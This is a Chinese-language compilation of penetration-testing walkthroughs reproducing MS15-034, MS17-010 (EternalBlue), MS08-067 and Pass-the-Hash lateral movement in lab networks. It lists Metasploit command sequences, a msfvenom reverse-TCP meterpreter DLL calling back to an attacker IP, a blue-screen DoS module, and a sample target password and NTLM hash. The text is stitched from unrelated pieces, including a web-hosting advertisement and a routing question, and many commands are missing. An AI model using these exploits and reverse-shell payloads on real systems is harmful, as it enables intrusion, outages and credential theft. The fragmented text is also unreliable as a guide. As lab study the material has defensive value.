MS15-034復(fù)現(xiàn)

漏洞主要影響了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在內(nèi)的主流服務(wù)器操作系統(tǒng)。IIS6.0以上。

創(chuàng)新互聯(lián)公司成立于2013年，先為嘉魚等服務(wù)建站，嘉魚等地企業(yè)，進(jìn)行企業(yè)商務(wù)咨詢服務(wù)。為嘉魚企業(yè)網(wǎng)站制作PC+手機(jī)+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問題。

靶機(jī)：win7? iis7

win7安裝好iis服務(wù)后訪問80端口，檢測是否存在漏洞：使用curl發(fā)送以下數(shù)據(jù)

curl -H "Host: 192.168.137.129" -H "Range: bytes=0-18446744073709551615"

當(dāng)出現(xiàn)Requested Range Not Satisfiable時(shí)說明存在漏洞。

使用metasploit的auxiliary/dos/http/ms15_034_ulonglongadd模塊可直接造成服務(wù)器藍(lán)屏，

使用auxiliary/scanner/http/ms15_034_http_sys_memory_dump模塊檢測時(shí)僅針對：windoiws 8.1, 2012, or 2012R2有效。

WIN7系統(tǒng)有2塊網(wǎng)卡 如何分別指定其中一個(gè)網(wǎng)卡綁定ARP信息

是需要添加靜態(tài)路由？

分別指定2塊不同的網(wǎng)卡走不同的路由就可以了吧？

類似于：

route add 172.26.34.0 mask 255.255.255.0 172.26.34.1

route add 203.92.218.0 mask 255.255.255.0 172.26.32.1

ms17-010：利用“永恒之藍(lán)”攻陷一臺(tái)計(jì)算機(jī)

我估摸著這兩天大家都應(yīng)該被一款老舊的勒索病毒刷爆了朋友圈，可能還有些同學(xué)不幸中招，那么是什么原因?qū)е铝诉@款勒索病毒如此猖狂？

這件事情還得從一個(gè)黑客組織說起，這個(gè)組織叫做Equation Group（方程式組織），這一黑客團(tuán)伙與美國國家安全局（NSA）的關(guān)系一直十分密切。而且外界也普遍認(rèn)為，Equation Group是美國國家安全局的一個(gè)下屬部門。很多安全研究專家表示，Equation Group這一黑客組織所擁有的技術(shù)無論是從復(fù)雜程度還是從其先進(jìn)程度來看，都已經(jīng)超越了目前絕大多數(shù)的黑客團(tuán)體，而且該黑客組織已經(jīng)活躍了二十多年了。

然而，這個(gè)黑客組織被另一黑客團(tuán)伙“The Shadow Brokers”（影子經(jīng)紀(jì)人）給入侵了……(就是這么任性)。“The Shadow Brokers”（影子經(jīng)紀(jì)人）自稱他們從Equation Group手里拿到了很大一部分黑客工具，決定公開叫賣。

本以為能狠賺一筆，但實(shí)際上卻沒有人鳥他們，就是這么神奇。于是The Shadow Brokers決定公開一部分有價(jià)值的工具，其中“eternalblue”（永恒之藍(lán)）就是其中之一（漏洞編號ms17-010）。那么永恒之藍(lán)這個(gè)漏洞利用程序究竟牛X到什么地步呢？這么說吧，除了windows 10以外，windows系列的系統(tǒng)無一能夠幸免。

于是乎，永恒之藍(lán)漏洞利用程序+wannacry勒索軟件程序造就了迄今為止最巨大的勒索交費(fèi)活動(dòng)，影響到近百個(gè)國家上千家企業(yè)及公共組織。

接下來，滿足小白的好奇心，一起探究The Shadow Brokers公布的永恒之藍(lán)漏洞利用程序，如何利用ms17-010攻陷一臺(tái)64位windows 7。

攻擊機(jī)1(192.168.1.101)：

裝有metasploit的linux

攻擊機(jī)2(192.168.1.137)：

可以運(yùn)行The Shadow Brokers工具箱的windows xp-python2.6+ PyWin32 v2.12

靶機(jī)(192.168.1.140)：

windows 7 x64（開放139、445端口）

利用The Shadow Brokers工具箱中的永恒之藍(lán)利用程序攻陷靶機(jī)

修改后的路徑與目錄當(dāng)前的路徑一致

一路回車，直到輸入項(xiàng)目名稱處，輸入項(xiàng)目名稱

繼續(xù)回車

繼續(xù)一路回車，直到選擇模式選擇1

繼續(xù)一路回車，直至攻擊完成

相關(guān)命令：

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll

一路回車，直到選擇系統(tǒng)架構(gòu)，由于我們要攻擊的主機(jī)是win 7 x64位，故這里選擇1

選擇2 dll注入

Ps：喜歡的留個(gè)贊b(￣▽￣)d ~也可以關(guān)注專題：黑客師。

ms08-067 復(fù)現(xiàn)，使用metasploit

時(shí)間：2022-03-10

一、環(huán)境準(zhǔn)備

1、需要準(zhǔn)備英文的windows xp 環(huán)境。

鏈接：

提取碼：y8mj

2、攻擊工具使用的是metasploit，kali 自帶。

二、復(fù)現(xiàn)時(shí)存在的問題

1、安裝完xp之后，我自己已經(jīng)復(fù)現(xiàn)了一次，發(fā)現(xiàn)拿到的system沒有相關(guān)命令，可能是這個(gè)新系統(tǒng)沒有添加到環(huán)境中，之后建立了一個(gè)文檔進(jìn)行讀取，也可直觀的看到結(jié)果。其他就沒遇到什么問題了。

三、復(fù)現(xiàn)演示

1、虛擬機(jī)準(zhǔn)備一下xp，建立一個(gè)test的文檔，查看一下靶機(jī) IP，靶機(jī)建立完成

2、使用metasploit 進(jìn)行攻擊

1）、msfconsole #進(jìn)入metasploit

2）、search ms08-067 #搜索相關(guān)exp

3）、use exploit/windows/smb/ms08_067_netapi #使用這個(gè)exp

4）、show payloads #搜索相關(guān)payload，能讓攻擊后建立連接

5）、set payload generic/shell_bind_tcp #我使用的是這個(gè)

6）、set RHOST 192.168.154.144 #設(shè)置靶機(jī)IP，讓它攻擊這個(gè)IP，端口默認(rèn)是445，這個(gè)就不需要設(shè)置了

7）、show options #可以用這個(gè)命令查看是否把相關(guān)配置設(shè)置全了

8）、run 或 exploit #進(jìn)行攻擊，兩個(gè)命令都可以

9）、type test.txt #之后攻擊成功了，使用windows命令 就可以去相關(guān)路徑下查看那個(gè) test 文檔了

演示圖：

ms17010漏洞的簡單利用

（第一次在發(fā)表文章，沒啥經(jīng)驗(yàn)，分享一些學(xué)習(xí)經(jīng)驗(yàn)。大佬們多多包涵，也希望大家能夠指出我的錯(cuò)誤。）

靶機(jī)：windows7 x64? IP：192.168.1.5

攻擊機(jī)：Kali Rolling (2019.3) x64 IP：192.168.1.3

兩臺(tái)主機(jī)在同一網(wǎng)段內(nèi)；win7關(guān)閉防火墻并且開啟445端口。

1、使用ipconfig/ifconfig分別查看win7和kali的ip。

2、打開msf工具

每次開啟都會(huì)有不同的界面

3、使用search命令搜索ms17_010

4、選擇模塊和設(shè)置條件

使用use來選擇第三個(gè)模塊，可以直接 use 2，也可以打全

然后用set來設(shè)置靶機(jī)IP set rhost 192.168.1.5

設(shè)置本機(jī)IP set lhost 192.168.1.3

設(shè)置監(jiān)聽端口 set lport 8888 不設(shè)置則默認(rèn)4444端口

設(shè)置payload set payload windows/x64/meterpreter/reverse_tcp

還有另外一個(gè)payload能用于本實(shí)驗(yàn)，具體可以 show payloads 查看

最后，可以使用show options檢查所有信息

5、開始滲透 run

稍等片刻 看到win則成功創(chuàng)建會(huì)話

6、成功之后，可以開啟Windows7的攝像頭，截圖等等

具體可以用help查看

1、關(guān)閉445端口

2、打開防火墻，安裝安全軟件

3、安裝對應(yīng)補(bǔ)丁，這里就不放鏈接了

關(guān)閉445端口的方法：

1）打開控制面板----Windows防火墻----高級設(shè)置

2）點(diǎn)擊新建規(guī)則，設(shè)置端口號的規(guī)則并且命名（如圖）

msf工具雖然強(qiáng)大，但只能用于已知的并且已提交模塊的漏洞。要理解漏洞原理，理解如何使用漏洞，甚至自己挖洞才能做到真正的去攻擊。而不是簡單的使用工具use和set。

橫向滲透之Pass The Hash

在上一章總結(jié)了windows抓取hash的一些方式。在實(shí)際場景中，我們需要更快的擴(kuò)大戰(zhàn)果，獲取更多控制權(quán)限，以及定位域環(huán)境。

橫向滲透：就是在得到一臺(tái)主機(jī)的控制權(quán)限后，將該主機(jī)作為突破口、跳板，利用既有的資源嘗試獲取更多的憑據(jù)、更高的權(quán)限，進(jìn)而達(dá)到控制整個(gè)內(nèi)網(wǎng)、擁有最高權(quán)限。

Pass The Hash 哈希傳遞簡稱PTH，可以在不需要明文密碼的情況下，利用LM HASH和NTLM HASH直接遠(yuǎn)程登錄。攻擊者不需要花費(fèi)時(shí)間來對hash進(jìn)行爆破，在內(nèi)網(wǎng)滲透里非常經(jīng)典。

常常適用于域/工作組環(huán)境。

靶機(jī)：windows server 2008

IP：10.211.55.19

domain：workgroup

user：administrator

pass：cseroad@2008

NTLM-Hash：82c58d8cec50de01fd109613369c158e

psexec類工具大同小異，大部分工具都是通過psexec來執(zhí)行的。原理是： 通過ipc$連接，將psexesvc.exe釋放到目標(biāo)機(jī)器，再通過服務(wù)管理SCManager遠(yuǎn)程創(chuàng)建psexecsvc服務(wù)，并啟動(dòng)服務(wù)。然后通過psexec服務(wù)運(yùn)行命令，運(yùn)行結(jié)束后刪除該服務(wù)。

如：Metasploit psexec，Impacket psexec，pth-winexe，Empire Invoke-Psexec

缺點(diǎn)：容易被殺軟檢測到

優(yōu)點(diǎn)：可以直接獲取system權(quán)限

因?yàn)槭忻婀ぞ弑容^多，只kali就自帶有很多。所以這里以好用、批量為準(zhǔn)則選擇了幾款工具。

mimikatz中pth功能的原理：

windows會(huì)在lsass中緩存hash值，并使用它們來ntlm認(rèn)證，我們在lsass中添加包含目標(biāo)賬號hash的合法數(shù)據(jù)結(jié)構(gòu)，就可以使用類似dir這些命令進(jìn)行認(rèn)證。

正常訪問server 2008 的盤符是需要用戶名密碼的。

在windows7上經(jīng)過pth之后就不需要密碼就可以遠(yuǎn)程連接。

將獲取的hash添加進(jìn)lsass中。

在windows 7 上執(zhí)行以下命令：

執(zhí)行后會(huì)彈出cmd。在cmd下執(zhí)行 net use \\10.211.55.19\c$ 命令就可以遠(yuǎn)程連接。

擴(kuò)展：

假如我們繼續(xù)探測到10.211.55.8使用的是同一個(gè)hash值。我們嘗試使用遠(yuǎn)程共享c盤和schtasks 定時(shí)計(jì)劃任務(wù)執(zhí)行獲取一個(gè)session。

powershell.bat為

當(dāng)重啟10.211.55.8機(jī)器后，metasploit可得到session

筆者經(jīng)常使用時(shí)的是這三個(gè)模塊

以exploit/windows/smb/psexec模塊為例

值得一說的是smbpass配置項(xiàng)支持明文密碼也支持hash(LM-Hash:NTLM-Hash)

成功返回system權(quán)限。

CobalStrike 同樣有psexec選項(xiàng)。

在得到一個(gè)beacon的基礎(chǔ)上，先在該網(wǎng)段portscan，探測存活主機(jī)后。

選擇View--Target--Login--psexec，可批量選擇主機(jī)pth。

選擇pth的用戶名和hash值。

從執(zhí)行的命令看得出依然利用的mimikatz。執(zhí)行成功后返回system權(quán)限。

該工具可以對C段主機(jī)批量pth。

項(xiàng)目在 github

在kali上直接apt就可以安裝

對工作組批量pth命令如下

測試的時(shí)候發(fā)現(xiàn)某些命令執(zhí)行后沒有回顯。

更多資料參考：

CrackMapExec：域環(huán)境滲透中的瑞士軍刀

紅隊(duì)測試工具-CrackMapExec-遠(yuǎn)程執(zhí)行Windows命令

wmi內(nèi)置在windows操作系統(tǒng)，用于管理本地或遠(yuǎn)程的 Windows 系統(tǒng)。wmiexec是對windows自帶的wmic做了一些強(qiáng)化。攻擊者使用wmiexec來進(jìn)行攻擊時(shí)，不會(huì)記錄日志，不會(huì)寫入到磁盤，具有極高的隱蔽性。

安裝成功后，切換到examples目錄下

運(yùn)行命令為

先加載Invoke-WMIExec.ps1腳本，再加載Invoke-TheHash.ps1腳本，因?yàn)镮nvoke-TheHash 里要用到 Invoke-WMIExec方法

如果要執(zhí)行系統(tǒng)命令?？梢约?Command 參數(shù)

執(zhí)行后該進(jìn)程會(huì)在后臺(tái)運(yùn)行，可以結(jié)合定時(shí)任務(wù)執(zhí)行嘗試反彈shell。

在測試中發(fā)現(xiàn)，在打了kb2871997 這個(gè)補(bǔ)丁后，常規(guī)的Pass The Hash已經(jīng)無法成功，但默認(rèn)的Administrator(SID 500)賬號例外，利用這個(gè)賬號仍可以進(jìn)行Pass The Hash遠(yuǎn)程ipc連接。

以上所有操作均針對的SID 500。

內(nèi)網(wǎng)滲透之PTHPTTPTK

橫向移動(dòng)

丟掉PSEXEC來橫向滲透